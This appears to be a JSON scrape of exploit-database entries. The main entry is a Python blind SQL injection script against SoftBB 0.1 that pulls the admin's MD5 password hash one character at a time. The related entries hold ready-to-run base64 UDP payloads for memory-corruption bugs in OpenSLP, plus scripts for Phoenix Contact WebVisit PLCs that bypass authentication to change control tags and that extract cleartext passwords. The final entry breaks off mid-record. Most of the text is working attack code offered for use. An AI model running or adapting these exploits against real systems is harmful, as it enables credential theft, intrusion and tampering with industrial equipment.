{"hash": "5a6d9bc02059e02f6bb425fb98bbf1c2248925220598386f05745995738376b5", "id": "1337DAY-ID-313", "lastseen": "2018-04-08T03:48:39", "viewCount": 11, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "50a47ceef913d434f22954fddd4d17f6", "key": "href"}, {"hash": "b8bec691997f0a30c7526f8318d7cc5f", "key": "modified"}, {"hash": "b8bec691997f0a30c7526f8318d7cc5f", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "972a685222d80b5f31cd7681ea1e0282", "key": "reporter"}, {"hash": "b5c1da0433ca0ba4714fa2eb39ca01ba", "key": "sourceData"}, {"hash": "54f97fa4bd9d57e0ef5c8357f0de5090", "key": "sourceHref"}, {"hash": "620daa74aa74720370a4072e3f94f94c", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-31559", "1337DAY-ID-30738", "1337DAY-ID-29439", "1337DAY-ID-28956", "1337DAY-ID-28870", "1337DAY-ID-28620", "1337DAY-ID-27766", "1337DAY-ID-27008", "1337DAY-ID-26603", "1337DAY-ID-26450"]}, {"type": "exploitdb", "idList": ["EDB-ID:36516", "EDB-ID:36418"]}], "modified": "2018-04-08T03:48:39"}, "vulnersScore": 7.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/313", "description": "Exploit for unknown platform in category web applications", "title": "SoftBB 0.1 (mail) Remote Blind SQL Injection Exploit", "history": [{"bulletin": {"hash": "c2a1959cae489d899df2cf96645878e4eafe9007489fc4766c05a85ebf5c66fc", "id": "1337DAY-ID-313", "lastseen": "2016-04-19T01:43:26", "enchantments": {"score": {"value": 4.3, "vector": "AV:N/AC:M/Au:M/C:P/I:P/A:N/", "modified": "2016-04-19T01:43:26"}}, "hashmap": [{"hash": "b8bec691997f0a30c7526f8318d7cc5f", "key": "published"}, {"hash": "b8bec691997f0a30c7526f8318d7cc5f", "key": "modified"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "3232317cfe2c5ea99deb5c0ad725ae13", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "82d3accbe6ba9f0180bc794abdc73aa7", "key": "sourceData"}, {"hash": "55fb51bdf8c7c4823c9e0414705ae7fd", "key": "href"}, {"hash": "620daa74aa74720370a4072e3f94f94c", "key": "title"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "972a685222d80b5f31cd7681ea1e0282", "key": "reporter"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/313", "description": "Exploit for unknown platform in category web applications", "viewCount": 2, "title": "SoftBB 0.1 (mail) Remote Blind SQL Injection Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "====================================================\r\nSoftBB 0.1 (mail) Remote Blind SQL Injection Exploit\r\n====================================================\r\n\r\n\r\n\r\n\r\n#!/usr/bin/env python\r\n# LOTFREE TEAM 03/2006\r\n#\r\n# Vulnerability info\r\n# Product : SoftBB\r\n# Version : 0.1\r\n#\r\n# The field 'mail' in reg.php is used directly in a SQL query :\r\n# $sql = 'SELECT pseudo,mail FROM '.$prefixtable.'membres WHERE pseudo = \"'.add_gpc($pseudoreg).'\" OR mail = \"'.$mail.'\"';\r\n# We can deduce deduce the result of some sql querys according to the error messages returned\r\n# The exploit test the characters of the md5 hash one by one using a special query\r\nimport httplib, urllib\r\n\r\n# Change the following values...\r\nadmin=\"admin\"\r\nserver=\"localhost\"\r\npath=\"/forum\"\r\n#\r\nhash=\"\"\r\nchars=('a','b','c','d','e','f','1','2','3','4','5','7','8','9','0')\r\n\r\nprint \"LOTFREE TEAM SoftBB BruteForcing tool\"\r\nprint \"-------------------------------------\"\r\nfor i in range(1,33):\r\n print \"Brute forcing hash[\"+str(i)+\"]\"\r\n for a in chars:\r\n params=urllib.urlencode({'pseudo':admin,\r\n 'mdp':'1',\r\n 'mdpc':'1',\r\n 'mail':'\" union select pseudo,1 from softbb_membres where pseudo=\"'+admin+'\" and substr(mdp,'+str(i)+',1)=\"'+a+'\" limit 1,1#',\r\n 'condok':'true'})\r\n headers = {\"Content-type\": \"application/x-www-form-urlencoded\", \"Accept\": \"text/plain\"}\r\n conn = httplib.HTTPConnection(server)\r\n conn.request(\"POST\", path+\"/index.php?page=reg\", params, headers)\r\n response = conn.getresponse()\r\n data = response.read()\r\n conn.close()\r\n if data.find(\"Ce pseudonyme est d\")>0:\r\n hash=hash+a\r\n continue\r\n\r\nprint\r\nif len(hash)==32:\r\n print \"Found hash =\",hash,\"for account\",admin\r\n print \"You can use http://md5.rednoize.com/ to crack the md5 hash\"\r\nelse:\r\n print \"Exploit failed... verify the path to the forum or try changing the limit 1,1 in the sql request...\" \r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2006-03-19T00:00:00", "references": [], "reporter": "LOTFREE", "modified": "2006-03-19T00:00:00", "href": "http://0day.today/exploit/description/313"}, "lastseen": "2016-04-19T01:43:26", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "====================================================\r\nSoftBB 0.1 (mail) Remote Blind SQL Injection Exploit\r\n====================================================\r\n\r\n\r\n\r\n\r\n#!/usr/bin/env python\r\n# LOTFREE TEAM 03/2006\r\n#\r\n# Vulnerability info\r\n# Product : SoftBB\r\n# Version : 0.1\r\n#\r\n# The field 'mail' in reg.php is used directly in a SQL query :\r\n# $sql = 'SELECT pseudo,mail FROM '.$prefixtable.'membres WHERE pseudo = \"'.add_gpc($pseudoreg).'\" OR mail = \"'.$mail.'\"';\r\n# We can deduce deduce the result of some sql querys according to the error messages returned\r\n# The exploit test the characters of the md5 hash one by one using a special query\r\nimport httplib, urllib\r\n\r\n# Change the following values...\r\nadmin=\"admin\"\r\nserver=\"localhost\"\r\npath=\"/forum\"\r\n#\r\nhash=\"\"\r\nchars=('a','b','c','d','e','f','1','2','3','4','5','7','8','9','0')\r\n\r\nprint \"LOTFREE TEAM SoftBB BruteForcing tool\"\r\nprint \"-------------------------------------\"\r\nfor i in range(1,33):\r\n print \"Brute forcing hash[\"+str(i)+\"]\"\r\n for a in chars:\r\n params=urllib.urlencode({'pseudo':admin,\r\n 'mdp':'1',\r\n 'mdpc':'1',\r\n 'mail':'\" union select pseudo,1 from softbb_membres where pseudo=\"'+admin+'\" and substr(mdp,'+str(i)+',1)=\"'+a+'\" limit 1,1#',\r\n 'condok':'true'})\r\n headers = {\"Content-type\": \"application/x-www-form-urlencoded\", \"Accept\": \"text/plain\"}\r\n conn = httplib.HTTPConnection(server)\r\n conn.request(\"POST\", path+\"/index.php?page=reg\", params, headers)\r\n response = conn.getresponse()\r\n data = response.read()\r\n conn.close()\r\n if data.find(\"Ce pseudonyme est d\")>0:\r\n hash=hash+a\r\n continue\r\n\r\nprint\r\nif len(hash)==32:\r\n print \"Found hash =\",hash,\"for account\",admin\r\n print \"You can use http://md5.rednoize.com/ to crack the md5 hash\"\r\nelse:\r\n print \"Exploit failed... verify the path to the forum or try changing the limit 1,1 in the sql request...\" \r\n\r\n\r\n\n# 0day.today [2018-04-08] #", "published": "2006-03-19T00:00:00", "references": [], "reporter": "LOTFREE", "modified": "2006-03-19T00:00:00", "href": "https://0day.today/exploit/description/313"}

{"zdt": [{"lastseen": "2018-11-12T06:53:07", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category local exploits", "modified": "2018-11-09T00:00:00", "published": "2018-11-09T00:00:00", "id": "1337DAY-ID-31559", "href": "https://0day.today/exploit/description/31559", "title": "OpenSLP 2.0.0 - Multiple Vulnerabilities", "type": "zdt", "sourceData": "OpenSLP 2.0.0 - Multiple Vulnerabilities\r\n\r\n==========================\r\n \r\nI discovered some bugs in openslp-2.0.0 back in January, 2018. \r\nOne of them I disclosed in June (dumpco.re/blog/openslp-2.0.0-double-free),\r\nand today I'm disclosing two more.\r\n \r\n \r\nBUG 1\r\n=====\r\n \r\nThis issue is an OOB read that does not crash the application.\r\nSo in terms of exploitation it is not very interesting. If that's what\r\nyou're here for then scroll down to bug#2.\r\nAfter the occurence of the bug the application actually detects the error\r\nand ignores the malicious packet. Therefore, it could be argued that this\r\nis not a bug at all. Nevertheless, here it is:\r\n \r\nProof of concept exploit:\r\n \r\n echo -n \"AgMAAAAAAAAAAAAAAAAAAPQAATEAAAAAB2VuAAAAF3M=\" | base64 -d > /dev/udp/127.0.0.1/427\r\n \r\nValgrind report:\r\n \r\n ==27968== Invalid read of size 1\r\n ==27968== at 0x412436: GetUINT16 (slp_message.c:63)\r\n ==27968== by 0x4159C7: v2ParseSrvReg (slp_v2message.c:327)\r\n ==27968== by 0x4159C7: SLPv2MessageParseBuffer (slp_v2message.c:1005)\r\n ==27968== by 0x40BF4A: SLPDProcessMessage (slpd_process.c:1393)\r\n ==27968== by 0x407139: IncomingDatagramRead (slpd_incoming.c:95)\r\n ==27968== by 0x407139: SLPDIncomingHandler (slpd_incoming.c:420)\r\n ==27968== by 0x40256B: main (slpd_main.c:699)\r\n ==27968== Address 0x5b5c3f1 is 0 bytes after a block of size 81 alloc'd\r\n ==27968== at 0x4C28C20: malloc (vg_replace_malloc.c:296)\r\n ==27968== by 0x40FC1C: SLPBufferAlloc (slp_buffer.c:67)\r\n ==27968== by 0x40FCBA: SLPBufferDup (slp_buffer.c:139)\r\n ==27968== by 0x40BF7F: SLPDProcessMessage (slpd_process.c:1383)\r\n ==27968== by 0x407139: IncomingDatagramRead (slpd_incoming.c:95)\r\n ==27968== by 0x407139: SLPDIncomingHandler (slpd_incoming.c:420)\r\n ==27968== by 0x40256B: main (slpd_main.c:699)\r\n \r\nAnalysis:\r\n \r\nv2ParseSrvReg is responsible for parsing incoming requests. Various bytes\r\nare read from the packet and interpreted as integers used as length fields.\r\nOne of them is the scopelistlen, parsed on line 321, and further used as\r\nargument for the amount of bytes to increment the buffer->curpos pointer\r\nin the the GetStrPtr function, shown below on line 112. It now points to\r\nuninitialized memory.\r\n \r\nThe OOB read occurs in GetUINT16, called on line 327 where the buffer->curpos \r\npointer is dereferenced.\r\n \r\nSubsequently the comparison on line 329 evaluates to true since the\r\nbuffer->curpos now points to memory located after the buffer->end\r\npointer. The application therefore stops processing the malicious packet.\r\n \r\n 291 static int v2ParseSrvReg(SLPBuffer buffer, SLPSrvReg * srvreg)\r\n 292 {\r\n 293 int result;\r\n 294\r\n 295 /* 0 1 2 3\r\n 296 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1\r\n 297 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n 298 | <URL-Entry> \\\r\n 299 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n 300 | length of service type string | <service-type> \\\r\n 301 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n 302 | length of <scope-list> | <scope-list> \\\r\n 303 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n 304 | length of attr-list string | <attr-list> \\\r\n 305 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\r\n 306 |# of AttrAuths |(if present) Attribute Authentication Blocks...\\\r\n 307 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ */\r\n 308\r\n 309 /* Parse the <URL-Entry>. */\r\n 310 result = v2ParseUrlEntry(buffer, &srvreg->urlentry);\r\n 311 if (result != 0)\r\n 312 return result;\r\n 313\r\n 314 /* Parse the <service-type> string. */\r\n 315 srvreg->srvtypelen = GetUINT16(&buffer->curpos);\r\n 316 srvreg->srvtype = GetStrPtr(&buffer->curpos, srvreg->srvtypelen);\r\n 317 if (buffer->curpos > buffer->end)\r\n 318 return SLP_ERROR_PARSE_ERROR;\r\n 319\r\n 320 /* Parse the <scope-list> string. */\r\n 321 srvreg->scopelistlen = GetUINT16(&buffer->curpos);\r\n 322 srvreg->scopelist = GetStrPtr(&buffer->curpos, srvreg->scopelistlen);\r\n 323 if (buffer->curpos > buffer->end)\r\n 324 return SLP_ERROR_PARSE_ERROR;\r\n 325\r\n 326 /* Parse the <attr-list> string. */\r\n 327 srvreg->attrlistlen = GetUINT16(&buffer->curpos);\r\n 328 srvreg->attrlist = GetStrPtr(&buffer->curpos, srvreg->attrlistlen);\r\n 329 if (buffer->curpos > buffer->end)\r\n 330 return SLP_ERROR_PARSE_ERROR;\r\n \r\n 54 /** Extract a 16-bit big-endian buffer value into a native 16-bit word.\r\n 55 *\r\n 56 * @param[in,out] cpp - The address of a pointer from which to extract.\r\n 57 *\r\n 58 * @return A 16-bit unsigned value in native format; the buffer pointer\r\n 59 * is moved ahead by 2 bytes on return.\r\n 60 */\r\n 61 uint16_t GetUINT16(uint8_t ** cpp)\r\n 62 {\r\n 63 uint16_t rv = AS_UINT16(*cpp);\r\n 64 *cpp += 2;\r\n 65 return rv;\r\n 66 }\r\n ...\r\n 96 /** Extract a string buffer address into a character pointer.\r\n 97 *\r\n 98 * Note that this routine doesn't actually copy the string. It only casts\r\n 99 * the buffer pointer to a character pointer and moves the value at @p cpp\r\n 100 * ahead by @p len bytes.\r\n 101 *\r\n 102 * @param[in,out] cpp - The address of a pointer from which to extract.\r\n 103 * @param[in] len - The length of the string to extract.\r\n 104 *\r\n 105 * @return A pointer to the first character at the address pointed to by\r\n 106 * @p cppstring pointer; the buffer pointer is moved ahead by @p len bytes\r\n 107 * on return.\r\n 108 */\r\n 109 char * GetStrPtr(uint8_t ** cpp, size_t len)\r\n 110 {\r\n 111 char * sp = (char *)*cpp;\r\n 112 *cpp += len;\r\n 113 return sp;\r\n 114 }\r\n \r\n \r\nProof of discovery: \r\n \r\n $ echo -n \"AgMAAAAAAAAAAAAAAAAAAPQAATEAAAAAB2VuAAAAF3M=\" | base64 -d | sha256sum\r\n 0d3f7a6e45a59def9097db4f103f95e4af2560bdb25853f9ee1c2e758c7d4946 -\r\n \r\ntwitter.com/magnusstubman/status/953909628622069760\r\n \r\n \r\nPatch:\r\n \r\nI'm not aware of any patch, and I'm not sure the maintainers are going to patch it.\r\n \r\nBUG 2\r\n=====\r\n \r\nFirst and foremost, I'm not claiming credit for this bug since it was\r\napparently discovered by Reno Robert and publicly disclosed on the\r\noss-security mailing list on 2016-09-27 and awarded CVE-2016-7567\r\nthe day after.\r\n \r\nopenwall.com/lists/oss-security/2016/09/27/4\r\nopenwall.com/lists/oss-security/2016/09/28/1\r\n \r\nAnyhow, I wasn't aware of the issue and found it by fuzzing, so I\r\nreported it to the maintainers who made me aware of the earlier discovery.\r\nWhat puzzled me was that no announcement had been made and the fact that\r\nthe latest stable version on their website is still vulnerable! I found it\r\n2017-12-06 and reported it 2018-01-18. See further down for proof of\r\ndiscovery.\r\n \r\nI havn't been able to find any exploit for this bug anywhere. Therefore,\r\nI'm today disclosing a proof-of-concept exploit for the bug to increase\r\nattention on the issue.\r\n \r\nExploit:\r\n \r\n echo -n \"AgkAAA8AAAAAAJuiAAAAAAAAAJtkaXJlYwB/ACssZVJlblxkZQkJCAkJ8wkJCQkJCYAJCQkJCWF0CQlkCQBkLCwsLEUsLCwsLCwsLCwsLCwsLCwsSCwsLCwsLIAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCysLCwsLCwAAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCxcZGUJCQgJCfMJCQkJCQkJCQkJCQlhdAkJZAkAZCwsLCwsLCwsLCwsLA==\" | base64 -d > /dev/udp/127.0.0.1/427\r\n \r\nValgrind report:\r\n \r\n ==56913== Invalid write of size 1\r\n ==56913== at 0x4C2D6A3: [email\u00a0protected]_2.2.5 (vg_replace_strmem.c:914)\r\n ==56913== by 0x40FD0B: SLPFoldWhiteSpace (slp_compare.c:210)\r\n ==56913== by 0x4100DC: SLPCompareString (slp_compare.c:374)\r\n ==56913== by 0x410331: SLPContainsStringList (slp_compare.c:514)\r\n ==56913== by 0x4103C6: SLPIntersectStringList (slp_compare.c:550)\r\n ==56913== by 0x40C606: ProcessSrvTypeRqst (slpd_process.c:1220)\r\n ==56913== by 0x40C606: SLPDProcessMessage (slpd_process.c:1431)\r\n ==56913== by 0x406F69: IncomingDatagramRead (slpd_incoming.c:94)\r\n ==56913== by 0x406F69: SLPDIncomingHandler (slpd_incoming.c:406)\r\n ==56913== by 0x402383: main (slpd_main.c:699)\r\n ==56913== Address 0x5b5dd06 is 0 bytes after a block of size 6 alloc'd\r\n ==56913== at 0x4C28C20: malloc (vg_replace_malloc.c:296)\r\n ==56913== by 0x415C51: _xmemdup (slp_xmalloc.c:356)\r\n ==56913== by 0x410096: SLPCompareString (slp_compare.c:365)\r\n ==56913== by 0x410331: SLPContainsStringList (slp_compare.c:514)\r\n ==56913== by 0x4103C6: SLPIntersectStringList (slp_compare.c:550)\r\n ==56913== by 0x40C606: ProcessSrvTypeRqst (slpd_process.c:1220)\r\n ==56913== by 0x40C606: SLPDProcessMessage (slpd_process.c:1431)\r\n ==56913== by 0x406F69: IncomingDatagramRead (slpd_incoming.c:94)\r\n ==56913== by 0x406F69: SLPDIncomingHandler (slpd_incoming.c:406)\r\n ==56913== by 0x402383: main (slpd_main.c:699)\r\n \r\nThe while loop on line 207 fails to perform bounds checking, and as such\r\nmay end up incrementing the pointer p up to a point such that p is bigger\r\nthan ep. Thus, the third argument to memmove on line 2010 becomes negative.\r\nHowever, since memmove accepts a size_t (which is unsigned) the value wraps\r\naround and becomes UINT_MAX or close to UINT_MAX resulting in memmove\r\nattempting to move an excessive amount of memory, resulting in OOB write.\r\n \r\n 184 /** fold internal white space within a string.\r\n 185 *\r\n 186 * folds all internal white space to a single space character within a\r\n 187 * specified string. modified the @p str parameter with the result and\r\n 188 * returns the new length of the string.\r\n 189 *\r\n 190 * @param[in] len - the length in bytes of @p str.\r\n 191 * @param[in,out] str - the string from which extraneous white space\r\n 192 * should be removed.\r\n 193 *\r\n 194 * @return the new (shorter) length of @p str.\r\n 195 *\r\n 196 * @note this routine assumes that leading and trailing white space have\r\n 197 * already been removed from @p str.\r\n 198 */\r\n 199 static int slpfoldwhitespace(size_t len, char * str)\r\n 200 {\r\n 201 char * p = str, * ep = str + len;\r\n 202 while (p < ep)\r\n 203 {\r\n 204 if (isspace(*p))\r\n 205 {\r\n 206 char * ws2p = ++p; /* point ws2p to the second ws char. */\r\n 207 while (isspace(*p)) /* scan till we hit a non-ws char. */\r\n 208 p++;\r\n 209 len -= p - ws2p; /* reduce the length by extra ws. */\r\n 210 memmove(ws2p, p, ep - p); /* overwrite the extra white space. */\r\n 211 }\r\n 212 p++;\r\n 213 }\r\n 214 return (int)len;\r\n 215 }\r\n \r\nProof of discovery:\r\n \r\n $ echo -n \"AgkAAA8AAAAAAJuiAAAAAAAAAJtkaXJlYwB/ACssZVJlblxkZQkJCAkJ8wkJCQkJCYAJCQkJCWF0CQlkCQBkLCwsLEUsLCwsLCwsLCwsLCwsLCwsSCwsLCwsLIAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCysLCwsLCwAAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCxcZGUJCQgJCfMJCQkJCQkJCQkJCQlhdAkJZAkAZCwsLCwsLCwsLCwsLA==\" | base64 -d | sha256sum\r\n 5bba9f9410bd4dffa4dc119477153002002db3fdd26a97080e43bfd95aeadb24 -\r\n \r\ntwitter.com/magnusstubman/status/938317849474555904\r\n \r\nPatch: sourceforge.net/p/openslp/mercurial/ci/34fb3aa5e6b4997fa21cb614e480de36da5dbc9a \r\n \r\nREFERENCES\r\n==========\r\n \r\n- sourceforge.net/p/openslp/bugs/161\r\n- sourceforge.net/p/openslp/bugs/160\r\n- twitter.com/magnusstubman/status/938317849474555904\r\n- twitter.com/magnusstubman/status/953909628622069760\r\n- sourceforge.net/p/openslp/mercurial/ci/34fb3aa5e6b4997fa21cb614e480de36da5dbc9a\r\n- openwall.com/lists/oss-security/2016/09/27/4\r\n- openwall.com/lists/oss-security/2016/09/28/1\n\n# 0day.today [2018-11-12] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/31559"}, {"lastseen": "2018-10-13T22:49:43", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category web applications", "modified": "2018-10-12T00:00:00", "published": "2018-10-12T00:00:00", "id": "1337DAY-ID-31316", "href": "https://0day.today/exploit/description/31316", "title": "Phoenix Contact WebVisit 2985725 - Authentication Bypass Exploit", "type": "zdt", "sourceData": "# Exploit Title: Phoenix Contact WebVisit 2985725 - Authentication Bypass\r\n# Date: 2018-09-30\r\n# Exploit Author: Deneut Tijl\r\n# Vendor Homepage: www.phoenixcontact.com\r\n# Software Link: https://www.phoenixcontact.com/online/portal/nl/?uri=pxc-oc-itemdetail:pid=2985725&library=nlnl&pcck=P-19-05-01&tab=5\r\n# Version: WebVisit (all versions)\r\n# CVE : CVE-2016-8380, CVE-2016-8371\r\n \r\n# Description\r\n# Script to read and write PLC tags via a Webvisit HMI page (even in case of a password protection)\r\n# Steps:\r\n# * Get Project Name: http://<ip>/\r\n# * Get list of tags: http://<ip>/<projectname>.tcr\r\n# * Get current values of tags: http://<ip>/cgi-bin/ILRReadValues.exe\r\n# * Set new tag values: http://<ip>/cgi-bin/writeVal.exe?<tag>+<value> (urlencode!)\r\n \r\n# CVE-2016-8380-SetPLCValues.py\r\n \r\n#! /usr/bin/env python\r\n \r\nimport urllib2\r\n \r\nstrIP = raw_input('Please enter an IP [192.168.1.200]: ')\r\nif strIP == '': strIP = '192.168.1.200'\r\n \r\ntry:\r\n URLResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/'))\r\nexcept urllib2.HTTPError:\r\n print('#### Critical Error with IP ' + strIP + ': no response')\r\n raw_input('Press Enter to exit')\r\n exit()\r\n \r\nstrProject = ''\r\nfor line in URLResponse.readlines():\r\n if 'ProjectName' in line:\r\n strProject = line.split('VALUE=\"')[1].split('\"')[0]\r\n \r\nif strProject == '':\r\n print('#### Error, no \\'ProjectName\\' found on the main page')\r\n raw_input('Press Enter to exit')\r\n exit()\r\n \r\nprint('---- Found project \\'' + strProject + '\\', retrieving list of tags')\r\n \r\ntry:\r\n TagResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/' + strProject + '.tcr'))\r\nexcept urllib2.HTTPError:\r\n print('#### Critical Error with IP ' + strIP + ': /' + strProject + '.tcr not found')\r\n raw_input('Press Enter to exit')\r\n exit()\r\n \r\narrTagList = []\r\nfor line in TagResponse.readlines():\r\n if line.startswith('#!-- N ='):\r\n intNumberOfTags = int(line.split('=')[1])\r\n print('---- There should be ' + str(intNumberOfTags) + ' tags:')\r\n if not line.startswith('#'):\r\n if not line.split(';')[0].strip() == '':\r\n arrTagList.append(line.split(';')[0].strip())\r\n print('-- '+line.split(';')[0].strip())\r\n \r\n \r\nraw_input('Press Enter to query them all')\r\nimport os, urllib\r\nos.system('cls' if os.name == 'nt' else 'clear')\r\nstrPost = '<body>'\r\nstrPost += '<item_list_size>' + str(len(arrTagList)) + '</item_list_size>'\r\nstrPost += '<item_list>'\r\nfor item in arrTagList:\r\n strPost += '<i><n>' + item + '</n></i>'\r\nstrPost += '</item_list></body>'\r\nDataResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/cgi-bin/ILRReadValues.exe', strPost)).read()\r\n \r\narrData = []\r\nfor item in DataResponse.split('<i>'):\r\n if '<n>' in item:\r\n name = item.split('<n>')[1].split('</n>')[0]\r\n value = item.split('<v>')[1].split('</v>')[0]\r\n arrData.append((name,value))\r\nprint('----- Full list of tags and their values:')\r\ni = 0\r\nfor item in arrData:\r\n i += 1\r\n print(str(i) + ': Tag ' + item[0] + ' has value: ' + item[1])\r\n \r\nans1 = raw_input('Want to change a tag? Enter a number or press Enter to quit: ')\r\nif ans1 == '':\r\n exit()\r\nstrTag = arrData[int(ans1) - 1][0]\r\nstrVal = arrData[int(ans1) - 1][1]\r\nans2 = raw_input('Setting value for ' + strTag + ' [' + strVal + ']: ')\r\nif ans2 == '': ans2 = strVal\r\nurllib2.urlopen(urllib2.Request('http://' + strIP + '/cgi-bin/writeVal.exe?' + urllib.quote_plus(strTag) + '+' + str(ans2)))\n\n# 0day.today [2018-10-13] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/31316"}, {"lastseen": "2018-10-11T18:54:19", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web applications", "modified": "2018-10-11T00:00:00", "published": "2018-10-11T00:00:00", "id": "1337DAY-ID-31303", "href": "https://0day.today/exploit/description/31303", "title": "Phoenix Contact WebVisit 6.40.00 - Password Disclosure Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Phoenix Contact WebVisit 6.40.00 - Password Disclosure\r\n# Exploit Author: Deneut Tijl\r\n# Vendor Homepage: www.phoenixcontact.com\r\n# Software Link: https://www.phoenixcontact.com/online/portal/nl/?uri=pxc-oc-itemdetail:pid=2985725&library=nlnl&pcck=P-19-05-01&tab=5\r\n# Version: WebVisit < 6.40.00\r\n# CVE: CVE-2016-8366\r\n \r\n# This script will perform retrieval of clear text credentials for a Phoenix Contact PLC with a WebVisit GUI, \r\n# password protected, application on it Tested on the Phoenix Contact ILC-390 PLC, but others are \r\n# surely equally vulnerable with WebVisit 6.40.00, the passwords are SHA256 hashes, which also will be retrieved\r\n \r\n# Sample output:\r\n# C:\\Users\\admin\\Desktop>CVE-2016-8366.py\r\n# Please enter an IP [192.168.1.200]:\r\n# This is the password for userlevel 1: pw1\r\n# This is the password for userlevel 2: SuperPass2\r\n# This is the password for userlevel 3: Extreme2TheMax3\r\n# This is the password for userlevel 4: PowerPass4\r\n# Press Enter to exit\r\n \r\n# PoC\r\n \r\n#! /usr/bin/env python\r\n \r\nimport urllib2, binascii\r\n \r\nstrIP = raw_input('Please enter an IP [192.168.1.200]: ')\r\nif strIP == '': strIP = '192.168.1.200'\r\n \r\ntry:\r\n URLResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/'))\r\nexcept urllib2.HTTPError:\r\n print('#### Critical Error with IP ' + strIP + ': no response')\r\n raw_input('Press Enter to exit')\r\n exit()\r\n \r\nstrMainTEQ = ''\r\nfor line in URLResponse.readlines():\r\n if 'MainTEQName' in line:\r\n strMainTEQ = line.split('VALUE=\"')[1].split('\"')[0]\r\n \r\nif strMainTEQ == '':\r\n print('#### Error, no \\'MainTEQ\\' found on the main page')\r\n raw_input('Press Enter to exit')\r\n exit()\r\n \r\ntry:\r\n LoginTeqResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/' + strMainTEQ))\r\nexcept urllib2.HTTPError:\r\n print('Critical Error with IP ' + strIP + ': File \\'' + strMainTEQ + '\\' not found')\r\n raw_input('Press Enter to exit')\r\n exit()\r\nstrAlldata = ''\r\nfor line in LoginTeqResponse.readlines():\r\n strAlldata += binascii.hexlify(line)\r\n \r\n## For vulnerable webvisit:\r\n## Seems to be 'userLevel' + x bytes + 1 + y bytes + 'password'\r\n## userLevel + '0506030001' + 31 + '00030003010301068300' + passlength + 'password'\r\n## For WebVisit > 6.40.00\r\n## userLevel + '0003000301030b06830040' + 'SHA256' (wich is 64 bytes)\r\n \r\narrData = strAlldata.split('757365724c6576656c0506030001') ## userLevel + '0506030001'\r\nfor item in arrData:\r\n if '00030003010301068300' in item:\r\n intUserlevel = int(binascii.unhexlify(item[:2]), 16) ## Turn str '31' into int 1\r\n strPassLength = item.split('00030003010301068300')[1][:2]\r\n strPassword = binascii.unhexlify(item.split('00030003010301068300')[1][2:2+(2*int(strPassLength,16))])\r\n print('This is the password for userlevel ' + str(intUserlevel) + ': ' + strPassword)\r\n elif '0003000301030b06830040' in item:\r\n intUserlevel = int(binascii.unhexlify(item[:2]), 16)\r\n strHash = binascii.unhexlify(item.split('0003000301030b06830040')[1][:64*2])\r\n print('This is the hash for userlevel ' + str(intUserlevel) + ': ' + strHash.lower())\r\nraw_input('Press Enter to exit')\n\n# 0day.today [2018-10-11] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://0day.today/exploit/31303"}, {"lastseen": "2018-07-17T20:05:49", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category web 